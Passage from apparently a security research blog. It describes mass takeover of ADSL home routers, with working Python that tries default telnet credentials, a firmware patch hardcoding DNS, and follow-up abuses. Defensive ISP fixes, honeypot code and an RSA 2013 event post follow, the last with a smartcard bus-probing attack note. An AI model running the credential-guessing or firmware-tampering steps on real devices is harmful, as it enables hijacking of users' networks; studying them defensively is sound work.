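DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("root", "root")]

def try_telnet_defaults(host, port=23, timeout=3.0):
    """Try each default pair against a telnet-style login prompt.

    Returns the first pair that appears to yield a shell prompt, else None.
    The '#'/'$' check is a crude stand-in for real success detection.
    """
    for user, password in DEFAULT_CREDS:
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.settimeout(timeout)
                s.recv(1024)                        # banner / "login: " prompt
                s.sendall(user.encode() + b"\r\n")
                s.recv(1024)                        # "Password: " prompt
                s.sendall(password.encode() + b"\r\n")
                reply = s.recv(1024)
                if b"#" in reply or b"$" in reply:  # looks like a shell prompt
                    return (user, password)
        except OSError:
            continue
    return None
```

Looping this over the expanded target list is the entirety of the attack’s first phase.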
We can illustrate the attacker’s plan with a simple diagram:

 

Attack Phase 2 (Command Persistence) 
Widely available tools such as binwalk, firmware-mod-kit, and Unix dd make it possible to modify firmware and gain persistent control over CPEs. And obtaining firmware for routers is relatively easy. There are several options:
  1. The router is supported by dd-wrt (http://dd-wrt.com)
  2. The attacker either works at an ISP or has a friend who works at an ISP and happens to have easy access to assorted firmware.
  3. Search engines and dorks.
As soon as the attacker is comfortable with his reverse-engineered and modified firmware, he can categorize the images by CPE model and match them to the authentication realm received from the CPE under attack. In fact, with a bit of tinkering an attacker can automate this process completely, including the ability to upload the new firmware to the CPEs he has targeted. Once installed, even a factory reset will not remove his control over that CPE.
The firmware modifications that would be of value to an attacker include but are not limited to the following:
  • Hardcoded DNS servers.
  • New iptables rules that work well on dd-wrt-supported CPEs.
  • Removal of the Upload New Firmware page.
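As a toy illustration of the first modification, hardcoding a DNS server can be as crude as replacing the four packed bytes of one IPv4 address with another inside an extracted configuration blob. Real images must first be unpacked (binwalk, firmware-mod-kit) and have their checksums fixed, and many devices store DNS settings as text instead; the addresses here are documentation-range placeholders:

```python
import socket

def swap_ip(blob: bytes, old: str, new: str) -> bytes:
    """Replace every packed occurrence of the IPv4 address `old` with `new`."""
    return blob.replace(socket.inet_aton(old), socket.inet_aton(new))

# A pretend fragment of an extracted firmware config with 8.8.8.8 embedded.
fragment = b"\x00dns\x00" + socket.inet_aton("8.8.8.8") + b"\x00"
patched = swap_ip(fragment, "8.8.8.8", "198.51.100.53")
```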
CPE attack phase recap
  1. An attacker gathers a country’s netblocks.
  2. He filters ADSL networks.
  3. He reverse engineers and modifies firmware.
  4. He scans ranges and uploads the modified firmware to targeted CPEs.
Follow-up attack scenarios
If an attacker is able to successfully compromise a large number of CPEs with the relatively simple attack described above, what can he do for a follow-up?
  • ISP attack: Let’s say an ISP has a large number of IP addresses vulnerable to the CPE compromise attack and an attacker modifies the firmware settings on all the ADSL routers on one or more of the ISP’s netblocks. Most ISP customers are not technical, so when their router is unable to connect to the Internet the first thing they will do is contact the ISP’s Call Center. Will the Call Center be able to handle the sudden spike in the number of calls? How many customers will be left on hold? And what if this happens every day for a week, two weeks or even a month? And if the firmware on these CPEs is unfixable through the Help Desk, they may have to replace all of the damaged CPEs, which becomes an extremely costly affair for the company.
  • Controlling traffic: If an attacker controls a huge number of CPEs and their DNS settings, being able to manipulate website traffic rankings will be quite trivial. The attacker can also redirect traffic that was supposed to go to a certain site or search engine to another site or search engine or anywhere else that comes to mind. (And as suggested before, the attacker can shut down the Internet for all of these users for a very long time.)
  • Company reputations: An attacker can post:
    • False news on cloned websites.
    • A fake marketing campaign on an organization’s website.
  • Make money: An attacker can redirect all traffic from the compromised CPEs to his ads and make money from the resulting impressions. An attacker can also add auto-clickers to his attack to further enhance his revenue potential.
  • Exposing machines behind NAT: An attacker can take it a step further by using port forwarding to expose all PCs behind a router, which would further increase the attack’s potential impact from CPEs to the computers connected to those CPEs.
  • Launch DDoS attacks: Since the attacker can control traffic from thousands of CPEs to the Internet he can direct large amounts of traffic at a desired victim as part of a DDoS attack.
  • Attack ISP service management engines, Radius, and LDAP: Every time a CPE is restarted a new session is requested; if an attacker can harvest enough of an ISP’s CPEs he can cause Radius, LDAP and other ISP services to fail.
  • Disconnect a country from the Internet: If a country’s ISPs do not protect against the kind of attack we have described an entire country could be disconnected from the Internet until the problem is resolved.
  • Stealing credentials: This is nothing new. If DNS records are totally in the control of an attacker, he can clone a few key social networking or banking sites and from there steal all the credentials he wants.
In the end it would be almost impossible to take back control of all the CPEs that were compromised through the attack strategies described above. The only way an ISP could recover from this kind of incident would be to make all their subscribers buy new modems or routers, or alternatively provide them with new ones.
Solutions
There are two parts to the solution: fixes from the CPE vendors and fixes from the ISPs.
Vendor solution: 
Vendors should stop shipping CPEs with rudimentary default passwords. When a router is installed on a user’s premises, the user should be required to change the administrator password to a random value before the CPE becomes fully functional.
ISP solutions: 
Let’s look at a normal flow of how a user receives his IP address from an ISP:
  1. The subscriber turns on his home router or modem, which sends an authentication request to the ISP.
  2. The ISP’s network devices handle the request and forward it to Radius to check the authentication data.
  3. The Radius server sends an Access-Accept or Access-Reject message back to the network device.
  4. On Access-Accept, DHCP assigns an IP to the subscriber, who can now access the Internet.
However, this is how we think this process should change:
  1. Before the subscriber receives an IP from DHCP the ISP should check the settings on the CPE.
  2. If the router or modem is using the default settings, the ISP should continue to block the subscriber from accessing the Internet. Instead of allowing access, the ISP should redirect the subscriber to a web page with a message: “You May Be At Risk: Consult your manual and update your device, or call our help desk for assistance.”
  3. Another way of doing this on the ISP side is to deny access from the Broadband Remote Access Server (BRAS) routers at the customer edge; an ACL could deny incoming traffic on ports such as 80, 443, 23, 21, 8000, and 8080.
  4. ISPs on international gateways should deny access to the above ports from the Internet to their ADSL ranges.
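The modified flow can be sketched as a simple gate that runs before DHCP hands out an address. The function and field names here are hypothetical, standing in for a real probe of the CPE over the ISP’s management network:

```python
# Hypothetical sketch of the proposed provisioning gate: Radius decides
# whether the subscriber authenticates at all, then a default-settings
# probe decides between real Internet access and a quarantine page.
DEFAULT_CREDS = {("admin", "admin"), ("admin", "password"), ("root", "root")}

def has_default_credentials(cpe):
    """Stand-in for probing the CPE over the ISP's management network."""
    return (cpe["user"], cpe["password"]) in DEFAULT_CREDS

def provision(cpe, radius_accepts):
    """Decide what the subscriber gets before DHCP assigns an address."""
    if not radius_accepts:
        return "reject"        # Radius sent Access-Reject
    if has_default_credentials(cpe):
        return "quarantine"    # redirect to the "You May Be At Risk" page
    return "grant"             # DHCP assigns an IP; Internet access works

print(provision({"user": "admin", "password": "admin"}, radius_accepts=True))
# quarantine
```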
Detecting attacks
ISPs should be detecting these types of attacks. Rather than placing sensors all over the ISP’s network, the simplest way to detect attacks and grab evidence is to lure such attackers into a honeypot. Sensors would be a waste of money and require too much administrative overhead, so let’s focus on one server:
  1. Take a few unused ADSL /24 subnets:
x.x.x.0/24
x.x.y.0/24 and so on
  2. Configure the server to be a sensor: a simple telnet server and a simple Apache server with htpasswd set up as admin/admin on the web server’s root directory would suffice.
  3. On the router that sits in front of the server, configure static routes that look something like this:
route x.x.x.0/24 next-hop <server-ip>;
route x.x.y.0/24 next-hop <server-ip>;
route x.x.z.0/24 next-hop <server-ip>;
  4. Redistribute the static routes into BGP to advertise them, so that anyone who scans or connects to any IP in the above subnets is redirected to your server.
  5. On the server side (it should probably be a Linux server) apply the following iptables rules:
iptables -t nat -A PREROUTING -p tcp -d x.x.x.0/24 --dport 23 -j DNAT --to-destination <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.y.0/24 --dport 23 -j DNAT --to-destination <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.z.0/24 --dport 23 -j DNAT --to-destination <server-ip>:24
  6. Configure the server’s honeypot to listen on port 24; the logs can be set to track the x.x.(x|y|z).0/24 subnets instead of the server.
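A minimal sketch of the honeypot’s telnet side (step 6): present a login prompt on port 24, record whatever a scanner submits, and never grant access. A production version would also record timestamps and the original destination subnet:

```python
import socket
import threading

def handle(conn, peer, log):
    """Play a telnet-style login prompt and record the submitted credentials."""
    try:
        conn.settimeout(10)
        conn.sendall(b"login: ")
        user = conn.recv(128).strip()
        conn.sendall(b"Password: ")
        password = conn.recv(128).strip()
        log(f"{peer[0]} tried {user!r} / {password!r}")
        conn.sendall(b"Login incorrect\r\n")   # never let the scanner in
    except OSError:
        pass
    finally:
        conn.close()

def serve(port=24, log=print):
    """Accept scanners forwarded here by the DNAT rules above, one thread each."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(16)
    while True:
        conn, peer = srv.accept()
        threading.Thread(target=handle, args=(conn, peer, log), daemon=True).start()
```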
Conclusion
The Internet is about traffic from a source to a destination and most of it is generated by users. If users cannot reach their destination the Internet is useless. ISPs should make sure that end users are secure, and users should demand that ISPs implement rules to keep them secure. At the same time, vendors should come up with a way to securely provision their CPEs before they are connected to the Internet, for example by forcing owners to set non-dictionary, random usernames and passwords for these devices.
INSIGHTS | February 25, 2013

IOAsis at RSA 2013

RSA has grown significantly in the 10 years I’ve been attending, and this year’s edition looks to be another great event. With many great talks and networking events, tradeshows can be a whirlwind of quick hellos, forgotten names, and aching feet. For years I would return home from RSA feeling as if I hadn’t sat down in a week and lamenting all the conversations I started but never had the chance to finish. So a few years ago during my annual pre-RSA Vitamin D-boosting trip to a warm beach an idea came to me: Just as the beach served as my oasis before RSA, wouldn’t it be great to give our VIPs an oasis to escape to during RSA? And thus the first IOAsis was born.


Aside from feeding people and offering much needed massages, the IOAsis is designed to give you a trusted environment to relax and have meaningful conversations with all the wonderful folks that RSA, and the surrounding events such as BSidesSF, CSA, and AGC, attract. To help get the conversations going each year we host a number of sessions where you can join IOActive’s experts, customers, and friends to discuss some of the industry’s hottest topics. We want these to be as interactive as possible, so the following is a brief look inside some of the sessions the IOActive team will be leading.

 

(You can check out the full IOAsis schedule of events at:

By Chris Valasek @nudehaberdasher

 

Hi everyone, Chris Valasek here. I just wanted to let everyone know that I will be participating in a panel in the RSA 2013 Hackers & Threats track (Session Code: HT-R31) on Feb 28 at 8:00 a.m. The other panelists and I will be giving our thoughts on the current state of attacks, malware, governance, and protections, which will hopefully give attendees insight into how we as security professionals perceive the modern threat landscape. I think it will be fun because of our varied perspectives on security and the numerous security breaches that occurred in 2012.

Second, Stephan Chenette and I will be talking about assessing modern attacks against PCs at IOAsis on Wednesday at 1:00-1:45. We believe that security is too often described in binary terms (“Either you ARE secure or you are NOT secure”), when computer security is not an either/or proposition. We will examine current mainstream attack techniques, how we plan non-binary security assessments, and finally why we think changes in methodologies are needed. I’d love people to attend either presentation and chat with me afterwards. See everyone at RSA 2013!

 

By Gunter Ollman @gollmann

 

My RSA talk (Wednesday at 11:20), “Building a Better APT Package,” will cover some of the darker secrets involved in the types of weaponized malware that we see in more advanced persistent threats. In particular I’ll discuss the way payloads are configured and tested to bypass the layers of defensive strata used by security-savvy victims. While most “advanced” features of APT packages are not very different from those produced by commodity malware vendors, there are nuances to the remote control features and levels of abstraction in more advanced malware that are designed to make complete attribution more difficult.

Over in the IOAsis refuge on Wednesday at 4:00 I will be leading a session with my good friend Bob Burls on “Fatal Mistakes in Incident Response.” Bob recently retired from the London Metropolitan Police Cybercrime Division, where he led investigations of many important cybercrimes and helped put the perpetrators behind bars. In this session Bob will discuss several complexities of modern cybercrime investigations and provide tips, gotchas, and lessons learned from his work alongside corporate incident response teams. By better understanding how law enforcement works, corporate security teams can engage with them more successfully and receive the attention and support they need.

By Stephan Chenette @StephanChenette

 

At IOAsis this year Chris Valasek and I will be presenting on a topic that builds on my Offensive Defense talk and opens a discussion about what we can do about the problems it describes.

For too long both Chris and I have witnessed the “old school security mentality” that revolves solely around chasing vulnerabilities and remediation of vulnerable machines to determine risk. In many cases the key motivation is regulatory compliance. But this sort of mind-set doesn’t work when you are trying to stop a persistent attacker.

What happens after the user clicks a link or a zero-day attack exploits a vulnerability to gain entry into your network? Is that part of the risk assessment you have planned for? Have you only considered defending the gates of your network? You need to think about the entire attack vector: reconnaissance, weaponization, delivery, exploitation, installation of malware, and command and control of the infected asset all need further consideration by security professionals. Have you given sufficient thought to the motives and objectives of the attackers and the techniques they are using? Remember, even if an attacker is able to get into your network, as long as they aren’t able to destroy or remove critical data the overall damage is limited.

Chris and I are working on an R&D project that we hope will shake up how the industry thinks about offensive security by enabling us to automatically create non-invasive scenarios to test your holistic security architecture and the controls within them. Do you want those controls to be tested for the first time in a real-attack scenario, or would you rather be able to perform simulations of various realistic attacker scenarios, replayed in an automated way producing actionable and prioritized items?

Our research and deep understanding of hacker techniques enables us to catalog various attack scenarios and replay them against your network, testing your security infrastructure and controls to determine how susceptible you are to today’s attacks. Join us on Wednesday at 1:00 to discuss this project and help shape its future.

 

By Tiago Asumpcao @coconuthaxor

 

At RSA I will participate in a panel reviewing the history of mobile security. It will be an opportunity to discuss the paths taken by the market as a whole, and an opportunity to debate the failures and victories of individual vendors.

 

Exploit mitigations, application stores and mobile malware, the wave of jail-breaking and MDM—hear the latest from the folks who spend their days and nights wrestling with modern smartphone platforms. While all members of the panel share a general experience within the mobile world, every individual brings a unique relationship with at least one major mobile industry player, giving the Mobile Security Battle Royale a touch of spice.

At IOAsis on Tuesday at 2:00 I will present on malware in application stores and privacy on mobile phones. I will talk about why it is difficult to automate malware analysis in an efficient way, and what can and cannot be done. From a privacy perspective, how can the user keep both their personal data and the enterprise’s assets separate from each other and secure within such a dynamic universe? To the enterprise, which is the biggest threat: malicious apps, remote attacks, or lost devices?
I will raise a lot of technical and strategic questions. I may not be able to answer them all, but it should make for lively and thought-provoking discussion.

 

By Chris Tarnovsky @semiconduktor
I will be discussing the inherent risks of reduced instruction set computer (RISC) processors vs. complex instruction set computer (CISC) processors at IOAsis on Tuesday at 12:00.

 

Many of today’s smart cards favor RISC architectures, with ARM, AVR, and CalmRisc16 the most common cores seen in smartcards. Although these processors provide high performance, they involve a trade-off from a security perspective.

 

The vendors of these devices offer security in the form of sensors, active meshing, and encrypted (scrambled) memory contents. From a low-level perspective, however, these protections still leave an attacker an easy way to block branch operations, making it possible to address the device’s entire memory map.

 

To prevent branches on an AVR or CalmRisc16, an attacker only needs to cut the highest bit and strap it to ‘0’. After doing so, the branch instruction is impossible to execute: an instruction that should have been a branch becomes something else, without the branch effect, allowing an attacker to sit on the bus using only one or two micro-probing needles.

 

On the other hand, CPU architectures such as 8051 or 6805 are not susceptible to such attacks. In these cases modifying a bus is much more complicated and would require a full bus width of edits.

 

I look forward to meeting everyone!